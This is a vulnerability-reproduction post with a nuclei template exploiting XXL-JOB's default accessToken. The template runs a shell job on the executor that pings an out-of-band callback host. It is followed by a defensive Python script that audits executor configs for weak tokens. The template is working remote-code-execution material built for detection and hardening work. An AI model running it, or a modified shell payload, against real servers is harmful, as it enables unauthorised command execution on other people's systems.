nuclei template:

```yaml
id: xxl-job-executor-default-accessToken-RCE

info:
  name: xxl-job-executor-default-accessToken-RCE
  author: known
  severity: high
  description: XXL-JOB 默认 accessToken 身份绕过,可导致 RCE
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="XXL-JOB"
  tags: xxl-job,rce

variables:
  filename: "{{to_lower(rand_base(10))}}"
  servicename: "{{to_lower(rand_base(20))}}"
  randjobid: "{{rand_int(999,999999)}}"
  datetime: '{{date_time("%Y-%M-%D %H:%m:%s")}}'
  unix_time: '{{date_time("{{datetime}}",unix_time())}}'

http:
  # The "@timeout: 25s" line is reconstructed from a garbled ": 25 s" fragment
  # in the extracted page (nuclei raw-request timeout annotation).
  - raw:
      - |
        @timeout: 25s
        POST /run HTTP/1.1
        Host: {{Host}}:9999
        XXL-JOB-ACCESS-TOKEN: default_token
        Content-Type: application/json

        {
          "jobId": {{randjobid}},
          "executorHandler": "demoJobHandler",
          "executorParams": "demoJobHandler",
          "executorBlockStrategy": "COVER_EARLY",
          "executorTimeout": 0,
          "logId": {{randjobid}},
          "logDateTime": {{unix_time}},
          "glueType": "GLUE_SHELL",
          "glueSource": "ping {{Host}}.{{randjobid}}.{{interactsh-url}}",
          "glueUpdatetime": {{unix_time}},
          "broadcastIndex": 0,
          "broadcastTotal": 0
        }

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```
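The template above works only because the executor still answers to the shipped token. As an added example (not part of the original post or of XXL-JOB's own code), here is a defender-side Python audit that parses an executor `application.properties`, flags the `xxl.job.accessToken` setting when it is missing, empty, the shipped `default_token`, or too short, and includes a helper for spotting proxy/WAF-logged requests that carry the default token. The property key is assumed from XXL-JOB's sample configuration; the file contents are constructed for the demo.

```python
"""Audit XXL-JOB executor configs for the default/absent accessToken weakness.

Added example, not from the original post or the XXL-JOB project. Assumes the
executor reads its token from the `xxl.job.accessToken` property (the key used
in XXL-JOB's sample configs); sample file contents below are constructed.
"""
import re

DEFAULT_TOKEN = "default_token"      # value the nuclei template sends as XXL-JOB-ACCESS-TOKEN
TOKEN_KEY = "xxl.job.accessToken"
MIN_TOKEN_LEN = 32                   # policy choice for this example, not an XXL-JOB requirement


def parse_properties(text):
    """Minimal Java .properties parser: skips '#'/'!' comments, accepts '=' or ':' separators."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def audit_access_token(text):
    """Return a list of findings; an empty list means the token setting looks acceptable."""
    token = parse_properties(text).get(TOKEN_KEY)
    if token is None:
        return [f"{TOKEN_KEY} not set: the executor skips the token check entirely"]
    if token == "":
        return [f"{TOKEN_KEY} is empty: the token check is disabled"]
    if token == DEFAULT_TOKEN:
        return [f"{TOKEN_KEY} is the shipped default '{DEFAULT_TOKEN}': anyone can POST jobs to /run"]
    if len(token) < MIN_TOKEN_LEN:
        return [f"{TOKEN_KEY} is short ({len(token)} chars); use a random value of {MIN_TOKEN_LEN}+ chars"]
    return []


def request_uses_default_token(headers):
    """True when a logged executor request carries the default token (header names are case-insensitive)."""
    value = {k.lower(): v for k, v in headers.items()}.get("xxl-job-access-token", "")
    return value.strip() == DEFAULT_TOKEN


# Constructed sample configs: a weak executor config and a hardened one.
WEAK_CONFIG = "### xxl-job executor\nxxl.job.admin.addresses=http://127.0.0.1:8080/xxl-job-admin\nxxl.job.accessToken=default_token\nxxl.job.executor.port=9999\n"
FIXED_CONFIG = "xxl.job.accessToken=" + "f" * 40 + "\n"

if __name__ == "__main__":
    for finding in audit_access_token(WEAK_CONFIG) or ["no findings"]:
        print(finding)
```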
Originally published on the WeChat public account 扫地僧的茶饭日常: [Vulnerability Reproduction] XXL-JOB default accessToken authentication bypass vulnerability